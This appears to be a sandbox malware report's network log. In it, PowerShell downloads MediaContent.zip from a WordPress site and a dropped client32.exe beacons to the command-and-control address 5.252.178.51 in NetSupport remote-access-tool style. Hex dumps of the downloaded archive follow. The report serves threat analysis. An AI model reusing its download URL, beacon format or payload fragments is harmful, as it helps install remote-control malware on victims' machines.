                                                                                                                      Sep 7, 2023 18:19:30.636286974 CEST8.8.8.8192.168.2.60x9be7No error (0)advisingdealers.com162.215.249.83A (IP address)IN (0x0001)false
                                                                                                                      Sep 7, 2023 18:19:30.843625069 CEST8.8.8.8192.168.2.60x2c1dNo error (0)www.advisingdealers.comadvisingdealers.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Sep 7, 2023 18:19:30.843625069 CEST8.8.8.8192.168.2.60x2c1dNo error (0)advisingdealers.com162.215.249.83A (IP address)IN (0x0001)false
                                                                                                                      Sep 7, 2023 18:19:41.597474098 CEST8.8.8.8192.168.2.60x8e0No error (0)geo.netsupportsoftware.comgeography.netsupportsoftware.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Sep 7, 2023 18:19:41.597474098 CEST8.8.8.8192.168.2.60x8e0No error (0)geography.netsupportsoftware.com62.172.138.8A (IP address)IN (0x0001)false
                                                                                                                      Sep 7, 2023 18:19:41.597474098 CEST8.8.8.8192.168.2.60x8e0No error (0)geography.netsupportsoftware.com62.172.138.67A (IP address)IN (0x0001)false
                                                                                                                      Sep 7, 2023 18:19:41.597474098 CEST8.8.8.8192.168.2.60x8e0No error (0)geography.netsupportsoftware.com51.142.119.24A (IP address)IN (0x0001)false
                                                                                                                      • www.advisingdealers.com
                                                                                                                      • 5.252.178.51connection: keep-alivecmd=pollinfo=1ack=1
                                                                                                                      • geo.netsupportsoftware.com
                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                      0192.168.2.649722162.215.249.83443C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                      1192.168.2.649729162.215.249.83443C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                      2192.168.2.6497305.252.178.51443C:\Users\user\AppData\Roaming\MediaContent\client32.exe
                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                      Sep 7, 2023 18:19:39.634902954 CEST3365OUTPOST http://5.252.178.51/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 5.252.178.51Connection: Keep-AliveCMD=POLLINFO=1ACK=1
                                                                                                                      Data Raw:
                                                                                                                      Data Ascii:


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                      3192.168.2.64973162.172.138.880C:\Users\user\AppData\Roaming\MediaContent\client32.exe
                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                      Sep 7, 2023 18:19:42.331034899 CEST3365OUTGET /location/loca.asp HTTP/1.1
                                                                                                                      Host: geo.netsupportsoftware.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Sep 7, 2023 18:19:42.642007113 CEST3366INHTTP/1.1 404 Not Found
                                                                                                                      Content-Type: text/html; charset=us-ascii
                                                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                                                      Date: Thu, 07 Sep 2023 16:19:42 GMT
                                                                                                                      Connection: close
                                                                                                                      Content-Length: 315
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                      4192.168.2.64973262.172.138.880C:\Users\user\AppData\Roaming\MediaContent\client32.exe
                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                      Sep 7, 2023 18:19:42.977366924 CEST3369OUTGET /location/loca.asp HTTP/1.1
                                                                                                                      Host: geo.netsupportsoftware.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Sep 7, 2023 18:19:43.301371098 CEST3369INHTTP/1.1 404 Not Found
                                                                                                                      Content-Type: text/html; charset=us-ascii
                                                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                                                      Date: Thu, 07 Sep 2023 16:19:42 GMT
                                                                                                                      Connection: close
                                                                                                                      Content-Length: 315
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                      5192.168.2.64973762.172.138.880C:\Users\user\AppData\Roaming\MediaContent\client32.exe
                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                      Sep 7, 2023 18:19:43.625535965 CEST3389OUTGET /location/loca.asp HTTP/1.1
                                                                                                                      Host: geo.netsupportsoftware.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Sep 7, 2023 18:19:43.949589968 CEST3459INHTTP/1.1 404 Not Found
                                                                                                                      Content-Type: text/html; charset=us-ascii
                                                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                                                      Date: Thu, 07 Sep 2023 16:19:43 GMT
                                                                                                                      Connection: close
                                                                                                                      Content-Length: 315
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                      0192.168.2.649722162.215.249.83443C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                      2023-09-07 16:19:22 UTC0OUTGET /wp-content/uploads/2018/01/MediaContent.zip HTTP/1.1
                                                                                                                      Host: www.advisingdealers.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2023-09-07 16:19:23 UTC0INHTTP/1.1 200 OK
                                                                                                                      Date: Thu, 07 Sep 2023 16:19:23 GMT
                                                                                                                      Server: Apache
                                                                                                                      Upgrade: h2,h2c
                                                                                                                      Connection: Upgrade, close
                                                                                                                      Last-Modified: Thu, 07 Sep 2023 14:41:03 GMT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      Content-Length: 2844081
                                                                                                                      Content-Type: application/zip
                                                                                                                      2023-09-07 16:19:23 UTC0INData Raw: 50 4b 03 04 14 00 00 00 08 00 b4 7a ee 50 fe b0 f7 49 f2 91 02 00 78 01 05 00 0b 00 00 00 48 54 43 54 4c 33 32 2e 44 4c 4c ec 3a 6d 70 14 55 b6 dd 33 3d 49 27 19 e8 c6 0d 8a 2b 65 62 a9 ef 21 e3 46 a4 79 f5 80 24 1a 84 49 82 12 98 49 c8 cc fa 31 09 28 6a cc f3 63 c5 69 91 7d 44 86 ed c4 9a c9 4d bb bc 12 6b 51 b7 a0 58 dc 2d ab de d6 13 6b ad 31 22 c6 99 4c 36 09 28 8a 58 25 01 2c 41 5d b5 63 78 88 10 61 90 31 fd ce b9 dd 93 99 49 26 e2 6e d6 7f af ab 92 db e7 de f3 7d cf 39 f7 a3 a7 e6 8e cd 8c 95 61 18 0e fe 74 9d 61 3a 19 e3 a9 60 2e fe 1c 87 bf a9 45 bb a7 32 af e6 ed bf aa 93 5d b6 ff aa 95 4d 0f 3c 56 fc ab b5 8f dc bf 76 f5 43 c5 f7 ac 7e f8 e1 47 fc c5 77 df 5b bc 56 7e b8 f8 81 87 8b 97 ac a8 2b 7e e8 91 35 f7 96 4c 99 92 7f 8d c9 a3 b3 78 f8 77
                                                                                                                      Data Ascii: PKzPIxHTCTL32.DLL:mpU3=I'+eb!Fy$II1(jci}DMkQX-k1"L6(X%,A]cxa1I&n}9ata:`.E2]M<VvC~Gw[V~+~5Lxw
                                                                                                                      2023-09-07 16:19:23 UTC8INData Raw: a9 ed f2 f7 53 a9 0e 27 4e 38 a0 f7 0c c1 f1 9c d5 4b 3f 9e d1 70 0c d4 0a fe 4d 4f 98 7c 69 8a 73 9f 28 a5 f6 1d 6e 83 1e 53 9d 39 8f 83 73 60 fe 76 a6 77 34 b1 6f d6 37 0b df b5 be e9 6c b0 be 99 5f ef 66 3f 76 8b 2e 37 53 50 25 73 5f ec 30 e0 09 c9 ce aa 51 94 0d 4c e5 86 4b 22 57 ec 81 36 8c 00 5d fa 2d 13 83 0a 24 be 25 b0 3f 6b 57 ae 05 36 72 93 86 1c d6 7e f7 3a f8 09 d5 bb 14 65 3b 2b 29 2d ef 13 f5 32 22 05 16 d2 ea 75 2b 15 e3 20 47 a4 cb 29 6b 74 9f 0a 06 30 87 24 57 f6 01 ef a5 d1 c6 73 6a b6 6c 9e 23 8b 26 25 cf b0 d4 96 c3 d8 ff 7c 7a ad 8f 11 b3 9e e5 b8 8c f5 22 76 93 52 05 80 ac a3 43 90 0c 7d 14 49 3e 0c 9a 7b f1 4c f0 ef 25 08 6d e8 03 a3 c0 5d a2 5a 0f f3 5e 66 d2 84 91 23 4a f7 b1 3a e9 4b c7 23 11 cc 66 2a 38 dd 7f d8 d0 e5 bc 78 49
                                                                                                                      Data Ascii: S'N8K?pMO|is(nS9s`vw4o7l_f?v.7SP%s_0QLK"W6]-$%?kW6r~:e;+)-2"u+ G)kt0$Wsjl#&%|z"vRC}I>{L%m]Z^f#J:K#f*8xI
                                                                                                                      2023-09-07 16:19:23 UTC15INData Raw: a4 77 68 cf 93 76 49 80 9a fa 76 6e 02 29 b4 a7 27 18 19 2b d6 96 a6 a4 c3 e3 c8 2e d6 a7 59 3f 68 8b 6c 85 15 3c b7 66 58 88 87 95 a9 37 f5 e3 77 f4 3a bd 97 b8 a4 a5 3c 5e df cc 3c 76 36 31 0b 56 06 f4 9c 92 8b 96 87 9d cb d0 e3 a4 a8 52 2e 2a f7 df 4e a6 9a c8 9d 16 eb 4e bb c1 ed a8 2b 1b 6a dd 39 dd 10 81 20 7c 2b a5 cd c9 3a dd c9 de dc 5f 71 ae 94 36 26 eb 2f 65 81 87 4f 81 97 16 ee 40 12 bd 74 df 49 21 e6 90 30 06 4c f8 1b 92 61 c9 b3 7f 1e 35 e0 72 87 f1 cb d1 c9 c0 42 9a a4 f5 08 70 fa a4 06 60 e3 00 02 07 90 9d 95 d2 1a 84 38 d8 19 e2 a3 bf aa 10 e5 aa 17 c3 1b 27 75 56 e8 6f 7f ad 5a a1 97 ab e7 7e bf 8c e6 1a 65 e7 32 2f bd fc a4 de 6e 7c 17 dc 3b 39 66 ad 28 35 08 42 97 0b 50 13 37 be a5 6a e3 72 69 85 a3 7e f1 95 24 df c2 e5 7b f9 ad 70 13
                                                                                                                      Data Ascii: whvIvn)'+.Y?hl<fX7w:<^<v61VR.*NN+j9 |+:_q6&/eO@tI!0La5rBp`8'uVoZ~e2/n|;9f(5BP7jri~${p
                                                                                                                      2023-09-07 16:19:23 UTC23INData Raw: d3 99 9e d9 06 53 d9 a3 94 2e 53 a7 32 dc 43 a3 1d d5 ea 54 5e 26 f8 53 49 15 96 e8 e7 e6 13 7a d7 36 75 42 43 23 d4 5b 60 78 b3 2f 33 22 2f ea 07 8e 46 77 61 4b e7 e2 a7 1f 3f 17 e1 e7 62 2c 00 7d e2 0e 27 c2 8b 7f f8 fc f2 44 f0 bd 96 f1 d9 3f 7a d3 53 30 eb b1 a8 48 1f 53 b4 1b 8f 12 1d 86 ef 11 40 2d f4 29 d6 4c eb 9b 05 79 d6 37 27 e7 ba 45 15 e0 30 f2 ee b9 d7 b4 5b 16 55 98 ba 06 9d 63 3e 79 4d bb bd e5 bb de 43 af 14 81 7c b0 55 5d e3 51 94 4a 1c 20 f8 a4 43 4a 81 29 e1 ab 07 bd 6a 54 32 9a b3 d5 2a 1e 41 57 9c 15 d8 c9 e6 f8 a2 1f 2f 8e 15 6d 1d a4 55 ef a6 3f 7d 0d f8 b9 38 0f ee f0 c1 f0 93 5d 70 e8 34 57 e7 df 90 5e 6f ad d8 0e 7e ae 4f ba 15 95 67 fb cf 03 9e 85 ef be c5 ae 7a 27 11 e8 dc 3b d5 48 cb 8e 73 7e 78 76 cd ab 3a 80 2d 83 4a b4 62
                                                                                                                      Data Ascii: S.S2CT^&SIz6uBC#[`x/3"/FwaK?b,}'D?zS0HS@-)Ly7'E0[Uc>yMC|U]QJ CJ)jT2*AW/mU?}8]p4W^o~Ogz';Hs~xv:-Jb
                                                                                                                      2023-09-07 16:19:23 UTC31INData Raw: e9 ef 9f 15 04 de 78 c9 8f 00 af 76 02 78 1a 01 a0 2b a4 b9 08 10 ea 04 f0 20 02 40 2f 49 8f 20 c0 ec 4e 00 53 10 00 fa 4c 92 10 60 b2 9e c8 50 8a 4a 24 74 a7 34 1b 01 ae d0 03 cc d6 00 a0 a7 a5 fb 10 c0 a0 07 98 ac 01 c0 20 48 b3 10 e0 84 14 4f 43 8d 22 08 7c 38 a4 bb 11 e0 9d 4e 00 bf 45 00 18 23 e9 2e 04 f8 4d 14 20 59 a4 67 07 a9 55 e0 f0 55 c1 f0 49 2b fa 03 d8 42 1d 1e ba 4d 03 fb 39 00 2c 47 00 8f 1e 60 a5 06 30 0f e3 5d 60 45 e3 34 80 c0 00 2f 6d f8 69 8c 27 42 2d 3f 44 22 d9 45 fb ac a1 27 e1 48 16 99 d6 bf 30 1b 19 d2 ff a8 de 63 3b 7f 43 f6 3d f3 fc 13 f9 0c cf ac d1 66 7f 54 18 a8 62 00 27 3e 9f 23 3e 43 d8 79 e2 01 58 ac 0b 8f 77 09 37 cc fa 43 93 39 29 cf 0b c2 a9 9f b4 47 22 ba 34 13 4b cb 2e da 18 b8 42 4f 82 73 03 29 dc c7 e3 22 88 0b e4
                                                                                                                      Data Ascii: xvx+ @/I NSL`PJ$t4 HOC"|8NE#.M YgUUI+BM9,G`0]`E4/mi'B-?D"E'H0c;C=fTb'>#>CyXw7C9)G"4K.BOs)"
                                                                                                                      2023-09-07 16:19:23 UTC39INData Raw: 60 09 7d 12 3d 84 ec c1 1d 90 25 c8 f8 22 bc 35 54 08 78 9a f0 dd 87 87 8e 01 2f 61 9b 95 b1 c6 38 16 7a 9c b3 50 59 8c 85 7c 36 2f e7 c3 a6 6c 90 7b de a8 dc 0b 99 a0 b2 4f b3 62 a2 2f 95 28 40 80 af 9f 8b 4b bf 57 b3 55 e5 00 db 85 4f 49 c0 8b 7c f0 d0 bf 1c b2 e3 67 0a 7e a6 c2 e1 6e 48 40 0d 01 c9 55 26 0c c8 3c 46 6f 4a 40 23 06 c0 bb e8 63 7d e0 e4 00 be 4b 15 c8 a9 a1 33 60 58 79 ea 5a 58 5e 4c 68 1d b7 3b ea 62 6f ce 23 24 e7 db af af c5 fe cd 2a da e0 bf 09 25 25 92 29 af c6 de 1a f3 03 e3 dd 2d f0 d5 a3 a2 e7 12 73 db b5 d0 c7 9b 1a b8 c4 c4 26 70 b3 1b c7 cc e5 e6 0a 8e 99 6c 69 ef e0 0e 41 71 a8 8f b0 54 82 5f 0b 54 d4 8b 80 72 5a 7c 2d bc 31 5f d8 00 ce 2f 66 94 a2 58 2a 1c 1a a1 2d ea ab 74 25 b1 fd d2 23 d7 80 44 1d 81 25 87 b2 92 be 27 95
                                                                                                                      Data Ascii: `}=%"5Tx/a8zPY|6/l{Ob/(@KWUOI|g~nH@U&<FoJ@#c}K3`XyZX^Lh;bo#$*%%)-s&pliAqT_TrZ|-1_/fX*-t%#D%'
                                                                                                                      2023-09-07 16:19:23 UTC47INData Raw: 47 33 3f 24 7b 21 99 0d e8 98 b9 db df d9 59 bb a7 a7 f1 dd cc 0f 8c 45 ad e4 bb cc 6f 95 0a 63 7d d9 cb 23 01 6b 6d 66 ab 31 b0 5d d9 7c cb 85 6b d6 7e 55 5b df db d8 4a 3a 32 cf 43 35 0d ca f6 41 a1 8c 6f 0e d7 86 6d c6 0e 72 24 f3 28 f9 30 b3 c9 58 74 58 59 d6 3b 71 58 a5 09 30 1e c8 3c 68 2c 3c a1 54 24 64 37 1e fe 80 1c cd 3c c8 31 36 1a 0b 5b 94 15 37 7e fe e2 b1 2f 6a 77 f5 36 36 42 95 50 4d 1b ab a6 6d f1 2b c3 6b eb 6d c6 ef b4 d6 b0 81 b0 3e e8 d9 b8 1b f0 ed 87 39 da fb 3c b4 7c 3b b4 fc 8a 6b cf d4 d6 24 19 6b 61 60 7a b7 65 9e 07 59 b1 62 d0 0b 91 51 93 6b 77 f5 32 36 02 63 f7 be a0 f5 dd ef af 5c f1 87 da 7a 2b 69 33 7e c7 92 3b 32 2f 70 79 94 bd e6 d7 ed b5 7b 7a eb 71 b3 29 de a3 ee 9e 99 0f 76 c2 dd a0 ac 18 f4 ab 7d 96 e7 00 2d e2 e7 b8
                                                                                                                      Data Ascii: G3?${!YEoc}#kmf1]|k~U[J:2C5Aomr$(0XtXY;qX0<h,<T$d7<16[7~/jw66BPMm+km>9<|;k$ka`zeYbQkw26c\z+i3~;2/py{zq)v}-
                                                                                                                      2023-09-07 16:19:23 UTC54INData Raw: 49 29 58 c9 0b 62 96 2f 16 f8 e5 91 f2 cd e0 f9 9c b2 07 23 93 e8 ef 0f d2 6b 86 ab 7d fa 0a 64 45 75 72 94 4a 99 af 21 7b 30 24 c4 4c 4b 4a d7 3e 36 13 4f 49 02 03 ab e0 85 08 6f 31 cb bc 8b 78 63 1f ef 92 4c 0a 49 16 cf 93 9d 6d 9a 94 90 91 c7 9a 94 47 cc 36 cd 48 80 e5 f1 b7 46 e2 2e 18 c6 b4 9f eb 5b 3b 5e fb b9 b1 8d e7 02 93 bf b7 f1 dc c5 cd 63 1b cf 75 6e fe be c6 73 2f 6e 1e d9 78 6e c7 e6 31 8d e7 fa ee 1f 97 f1 dc 2f b6 64 30 9e db b8 4d 48 e1 47 0d b1 7a 77 df a8 fc 5f d6 aa e5 54 fe 6f 05 fe 7f 26 a3 7c 0b 94 a0 17 45 99 79 1b ae cf f5 a8 be 65 4a cf c3 0e 6a 15 c5 4f af 0f 3b 64 0a 67 e3 95 14 0a 4b 41 dc e2 57 13 b2 90 ad a1 29 e9 f8 fa da af 0c 36 1b 31 f5 47 4b ea 8f 27 93 f8 b5 53 c6 e0 4a fd b8 3a 27 73 94 3f c4 d7 e0 f7 10 7f 5f e5 d5
                                                                                                                      Data Ascii: I)Xb/#k}dEurJ!{0$LKJ>6OIo1xcLImG6HF.[;^cuns/nxn1/d0MHGzw_To&|EyeJjO;dgKAW)61GK'SJ:'s?_
                                                                                                                      2023-09-07 16:19:23 UTC62INData Raw: 77 01 0f 57 2c 9a 79 f0 fd 1d f9 94 53 f5 38 51 85 a9 c2 a5 91 39 83 6e 5a fa d5 44 95 3c f9 bc b9 c6 be 4a 97 cc 83 0b c6 9b 7d 8b d8 86 24 da 4f a7 ad 8f 2e 65 a9 43 ed 72 7f 54 bb dc d0 ff f5 38 1a 33 70 35 12 2c 8b 06 97 76 33 f4 c0 5e d7 7c cd 4b 48 0e 73 99 e3 ea b2 3e 61 5f 33 24 95 a3 85 9b 21 de a3 75 69 13 9c 5a f6 8e 2d f0 d3 92 58 68 3d 6d 3d 5b d7 5c d4 30 11 5f e4 9a 3e d3 b6 df d1 79 25 84 99 56 2a 66 90 87 38 22 f3 4d b7 42 82 a5 f0 67 32 eb ff 20 7b b3 c9 fc 6f fe 5d 14 c1 f0 ff 86 a6 1c cb 7d 50 7b ef 40 dd 99 9a c8 1b d7 d3 47 db 40 bf c6 83 f6 77 a0 f9 aa 8f c0 83 2d b9 9d 5f 0f f5 38 51 b7 37 af 71 62 31 c8 1c d5 aa 46 0c e9 b6 ba f3 85 52 76 e3 44 ad cc 01 60 48 fc 52 2c 71 08 13 8f e1 89 eb 9a 51 fa a8 6b 7e 57 d8 f7 76 43 a6 b0 98
                                                                                                                      Data Ascii: wW,yS8Q9nZD<J}$O.eCrT83p5,v3^|KHs>a_3$!uiZ-Xh=m=[\0_>y%V*f8"MBg2 {o]}P{@G@w-_8Q7qb1FRvD`HR,qQk~WvC
                                                                                                                      2023-09-07 16:19:23 UTC70INData Raw: ee 9e 43 56 b1 40 7d 17 0f 2d d3 e8 b0 52 fe 74 52 d3 a7 89 3d f3 6e b4 d5 89 a3 d5 63 ee a3 1b 9d 6a 57 dd 8c 14 c9 3c 77 8e fb dd 0d 5f 41 1a 6c 57 69 bc da 1c 6e 87 fc eb 8f 6f f9 82 d5 0f 37 f0 0c 7f 0f 1e 3d 25 0e 10 43 5f a0 d2 6d 81 e3 92 fd b2 a5 dd e1 5f d0 e9 53 54 95 a2 39 4d d6 43 4d e7 13 a0 a4 60 e6 53 58 a6 e2 b1 ab 56 2a 35 17 4a 7d c0 6f c1 8e 10 65 ef 6e a3 ca 40 f7 93 b2 d4 12 34 b9 6d 3d 1c 49 ae cb 4b 91 ac 9a c7 5e e4 6e da 70 a6 b7 c4 81 4e 89 23 45 7e 93 de fb 77 6e d3 bb e6 03 09 c8 d3 f3 f6 e3 e5 01 98 92 37 3b d5 db 1c 3d 4d 76 d1 de db 84 4a c6 a2 55 2d c9 a0 82 b1 54 9b 88 59 aa 1e fb d5 28 18 76 5b 3d 7d c4 bf a1 fb 3c 81 dd 27 67 36 9d 0e 7b ec 86 96 c8 0f 53 63 0d 53 76 13 9f 3d a6 60 6b 8e 29 d2 8f 87 e9 b8 a9 7f b0 5a 88
                                                                                                                      Data Ascii: CV@}-RtR=ncjW<w_AlWino7=%C_m_ST9MCM`SXV*5J}oen@4m=IK^npN#E~wn7;=MvJU-TY(v[=}<'g6{ScSv=`k)Z
                                                                                                                      2023-09-07 16:19:23 UTC78INData Raw: b0 80 c1 f6 1a 3b 18 be 60 02 79 ed fa 2f f4 3d 54 8f 7d d7 c9 0f e3 b4 2b a7 58 07 69 11 a9 55 f6 0a bc 8b 98 54 ce aa 5a 70 cd f6 8b 0e 20 91 c9 bf 20 18 e8 ec 43 03 6e 5e 36 f1 71 1c 95 08 56 02 ed 7d f8 9e 4b 53 3a cc b2 27 09 d8 81 47 f4 c1 93 f8 dc d1 8e cf a7 de c1 e7 de a3 f8 3c 80 fe 86 d6 3e bc 23 4a 3f c1 53 f4 f3 d4 61 fa 09 bc 46 3f bf 08 d1 cf 6f 5e 81 9f 27 1f 09 74 a1 83 22 8f 2d 58 66 53 82 dd 17 d0 6b 2c 96 67 06 c6 ab 04 18 86 cd ef 53 82 9d f8 52 e6 50 82 1d e4 c0 d7 09 10 c2 e5 54 1f fa d9 5d 0f 4c dd 0f 3c 49 4b 17 4d 38 1d 21 da b0 06 df c2 79 bd 33 00 6d ad 57 ba fa 75 3c 9c d3 a5 92 d7 9f 8e 8d 55 9f 36 fd e4 50 8a 73 44 4c da 26 88 8f 40 f7 7c cc 07 c7 d8 4c 21 9f df c2 7e c0 95 62 7d 5a 7a b5 89 74 c9 d7 91 23 6e ca f8 e2 8b 81
                                                                                                                      Data Ascii: ;`y/=T}+XiUTZp Cn^6qV}KS:'G<>#J?SaF?o^'t"-XfSk,gSRPT]L<IKM8!y3mWu<U6PsDL&@|L!~b}Zzt#n
                                                                                                                      2023-09-07 16:19:23 UTC86INData Raw: 0b bc 43 0c 18 35 5c 3d 64 2a fb 55 3b 5e 23 cc 72 77 89 0e f6 53 7a 2f 72 77 a1 53 40 07 93 53 cd 64 d7 39 c9 c7 7e 8e a6 e6 7a 8b 1d a8 4e 59 21 d4 d7 51 27 b5 ab 33 83 a5 66 65 b8 ba 30 23 27 3a 5f 59 68 73 9f af 9d 50 81 cb 5a 76 f5 33 86 bb a1 48 19 d7 4c c1 63 f7 07 40 86 97 cf a2 77 8b b3 e8 dd a2 49 ee 98 a4 1e 6b 3a 97 40 4e 2b 76 0c 72 5a 61 cb 12 d3 fc 96 f2 f2 45 6c 14 20 7a c5 21 5c 62 45 35 71 32 94 da 58 66 6f b0 47 46 e3 ad 20 14 65 b1 b8 3f 3d 6d 14 97 5f d3 27 26 eb 74 8a d8 0d 83 18 74 f0 df 33 db 51 24 26 ca 0f d8 61 72 d3 e6 db b6 0c 53 47 34 58 34 33 5a ea 74 08 07 43 8b bc 6c 13 32 6f 5d 25 32 b1 59 4b 34 b6 9d bb 22 a3 a0 cd 1b 3d 76 ad cc c1 f6 22 67 99 a9 41 4e 35 0e d3 b6 7f 1a 47 34 8b 7a e6 3a 8a 20 2a 8a ac 7d 62 aa fc 20 2c
                                                                                                                      Data Ascii: C5\=d*U;^#rwSz/rwS@Sd9~zNY!Q'3fe0#':_YhsPZv3HLc@wIk:@N+vrZaEl z!\bE5q2XfoGF e?=m_'&tt3Q$&arSG4X43ZtCl2o]%2YK4"=v"gAN5G4z: *}b ,
